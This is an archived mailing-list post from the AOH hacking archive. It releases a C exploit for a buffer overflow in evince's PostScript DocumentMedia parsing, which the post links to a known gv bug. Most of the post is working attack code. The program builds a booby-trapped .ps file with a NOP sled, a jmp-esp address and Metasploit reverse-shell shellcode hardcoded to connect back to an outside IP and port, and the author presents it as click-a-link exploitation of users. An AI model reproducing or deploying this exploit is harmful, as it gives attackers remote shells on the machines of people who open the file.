AOH :: HP Unsorted E :: C07-1035.HTM

evince buffer overflow exploit (gv)



evince buffer overflow exploit (gv)
evince buffer overflow exploit (gv)




--Dxnq1zWXvFF0Q93v
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

hey team, seems evince is vuln through it's embedded use of gv to the same hole 
described in bid 20978. here is exploit code for evince. users using
epiphany web browser beware, this is click-a-link exploitation.

--K-sPecial

--Dxnq1zWXvFF0Q93v
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="evince-ps-field-bof.c"

/*
 * Creator: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)
 * Name: evince-ps-field-bof.c
 * Date: 11/27/2006
 * Version: 
 * 	1.00 - creation
 *
 * Other: this idea originaly came from the bid for the 'gv' buffer overflow (20978), i don't
 *  believe it's known until now that evince is also vulnerable. 
 *
 * Compile: gcc -o epfb evince-ps-field-bof.c -std=c99
*/
#include 
#include 
#include 
#include 
#include 

// insert shellcode here, i'm not going to implement ip/port changing since
// metasploit's shellcode generation engine does it just fine. i had a picky time
// with the shellcodes, there must be some bad bytes. this shellcode from 
// metasploit works but be SURE to set Encoder=None

/* linux_ia32_reverse - LHOST=67.76.107.14 LPORT=5555 Size=70 Encoder=None http://metasploit.com */ 
char cb[] "\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\x43\x4c\x6b\x0e\x66\x68"
"\x15\xb3\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80";

// location of "jmp *%esp"
char jmpesp[] = "\x77\xe7\xff\xff";

int main (int argc, char **argv) {
	FILE *fh;

	if (!(fh = fopen(*(argv+1), "w+b"))) { 
		printf("%s \n\n", *(argv));
		printf("[-] unable to open file '%s' for writing: %s\n", *(argv+1), strerror(errno));
		exit(1);
	}

	fputs("%!PS-Adobe-3.0\n", fh);
	fputs("%%Title: hello.ps\n", fh);
	fputs("%%For: K-sPecial (xzziroz.net) of .aware (awarenetwork.org)\n", fh);
	fputs("%%BoundingBox: 24 24 588 768\n", fh);
	fputs("%%DocumentMedia: ", fh);
	for (int i = 0; i < 100; i++) 
		fputc(0x90, fh);

	fwrite(cb, strlen(cb), 1, fh);

	for (int i = strlen(cb) + 100; i < 273; i++) 
		fputc('A', fh);

	fwrite(jmpesp, 4, 1, fh);
	fwrite("\xe9\x02\xff\xff\xff", 5, 1, fh);

	fputc('\n', fh);

	fputs("%%DocumentData: Clean7Bit\n", fh);
	fputs("%%Orientation: Landscape\n", fh);
	fputs("%%Pages: 1\n", fh);
	fputs("%%PageOrder: Ascend\n", fh);
	fputs("%%+ encoding ISO-8859-1Encoding\n", fh);
	fputs("%%EndComments\n", fh);

	return(0);
}

--Dxnq1zWXvFF0Q93v--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.